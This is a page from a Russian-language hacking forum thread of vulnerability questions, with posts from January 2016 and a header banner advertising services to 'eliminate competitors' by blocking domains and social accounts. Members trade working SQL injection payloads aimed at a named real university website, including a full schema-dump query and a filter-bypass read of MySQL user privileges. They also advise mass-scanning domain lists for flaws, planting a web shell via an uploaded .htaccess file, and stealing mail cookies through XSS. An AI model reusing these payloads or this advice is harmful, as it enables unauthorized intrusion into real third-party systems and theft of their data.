УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 107 из 296

107

Опции темы

Поиск в этой теме

Опции просмотра

#1061

27.01.2016, 12:42

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Filipp

Filipp said:
↑
Подобрал что бы было ровно 4096 символов, и все равно ошибка инклуда. Похоже в этой версии этот трюк уже не работает.

с 5.3 не работает. https://rdot.org/forum/showthread.php?t=343

#1062

27.01.2016, 20:19

MDen1s

Guest

Сообщений: n/a

Провел на форуме:
3362

Репутация: 0

Пожалуйста,помогите найти таблицу пользователей просмотрел все, но найти почему-то не смог (

http://som.adzu.edu.ph/newsupdates/...5,6 from information_schema.tables limit 97,1

#1063

27.01.2016, 20:37

R3hab

Guest

Сообщений: n/a

Провел на форуме:
31545

Репутация: 6

Цитата:

Сообщение от MDen1s

MDen1s said:
↑
Пожалуйста,помогите найти таблицу пользователей просмотрел все, но найти почему-то не смог (
http://som.adzu.edu.ph/newsupdates/...5,6 from information_schema.tables limit 97,1

ее может и не быть, ибо не было бы этой темы /threads/424558/

#1064

29.01.2016, 00:08

RWD

Guest

Сообщений: n/a

Провел на форуме:
56255

Репутация: 2

Подскажите на какие ошибки можно еще проверить?

именно массово. Есть база доменов, проверял на кавычку, и гит. Есть еще какие идеи?

#1065

29.01.2016, 00:19

blackbox

Guest

Сообщений: n/a

Провел на форуме:
137056

Репутация: 11

Цитата:

Сообщение от RWD

RWD said:
↑
Подскажите на какие ошибки можно еще проверить?
именно массово. Есть база доменов, проверял на кавычку, и гит. Есть еще какие идеи?

На вордпресс и джумлу еще, на майдамин незапароленный. А если уязвимости, то выбор тут невелик, по-моему: инклуды, sql, xss. XSS можно снимком экрана проверять, phantomjs такое из-коробки умеет делать, к примеру.

#1066

29.01.2016, 17:20

zot123

Guest

Сообщений: n/a

Провел на форуме:
301

Репутация: 0

Заранее прошу прощение за возможный оффтоп, но я уже множество статей и форумов перерыл по поводу темы xss, в том числе и на данном ресурсе.

Пытаюсь разобраться с xss, но никак не удаётся, к тому же многие темы примерно 10-и летней давности и мне кажется, что сейчас многое изменилось, в том числе и уязвимости уже не те. Меня интересует xss и куки в почте. Подскажите свежие темы? Или кто может помочь с этим? Буду очень благодарен, и возможно финансовая благодарность.

#1067

29.01.2016, 19:44

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

Цитата:

Сообщение от zot123

zot123 said:
↑
Заранее прошу прощение за возможный оффтоп, но я уже множество статей и форумов перерыл по поводу темы xss, в том числе и на данном ресурсе.
Пытаюсь разобраться с xss, но никак не удаётся, к тому же многие темы примерно 10-и летней давности и мне кажется, что сейчас многое изменилось, в том числе и уязвимости уже не те. Меня интересует xss и куки в почте. Подскажите свежие темы? Или кто может помочь с этим? Буду очень благодарен, и возможно финансовая благодарность.

В XSS ничего не изменилось,браузеры фильтруют XSS лучше чем когда то,флаг httponly мешает,инфа если будет то приватно

#1068

29.01.2016, 21:14

t0ma5

Guest

Сообщений: n/a

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от RWD

RWD said:
↑
Привет, подскажите
Есть папка для картинок, в нее загружается php файл, но в htaccess такое. И в итоге шел не работает.

Код:

Code:
Options -Indexes

  php_value engine off

  php_value engine off

попробуй загрузить свой .htaccess

кстати можно заодно и шелл в .htaccess запилить /threads/298338/

#1069

30.01.2016, 00:31

PulsarEX547

Guest

Сообщений: n/a

Провел на форуме:
3988

Репутация: 0

Нашел sqli на сайте - (post method)

1) подобрал количество столбцов -24, запрос отработал, ошибка пропала, все вроде как норм.

webcastID=' order by 24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&subm it=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C28 6&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion

2) даю второй запрос на колонки, снова появляется ошибка, и выводимой колонки так и нет(

webcastID=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&subm it=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C28 6&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion

Как так, и что делать дальше?

#1070

30.01.2016, 00:44

PulsarEX547

Guest

Сообщений: n/a

Провел на форуме:
3988

Репутация: 0

Цитата:

Сообщение от MDen1s

ты что все это руками перебирал через лимит? Так уже никто не делает)

http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union select 1,(select(@x)from(select(@x:=0x00),(select(0)from( information_schema.columns)where(table_schema!=0x6 96e666f726d6174696f6e5f736368656d61)and(0x00)in(@x :=concat(@x,0x3c62723e,table_schema,0x2e,table_nam e,0x3a,column_name))))x),3,4,5,6-- -

все базы.таблицы:колонки смотри что надо в удобоваримом виде.

-1 /*!50000union*/+/*!50000sElect*/ 1,file_priv,3,4,5,6 from mysql.users-- -

SELECT command denied to user 'som'@'localhost' for table 'users'

странно почему SELECT не получилось провести, или ту дело не в фильтре?....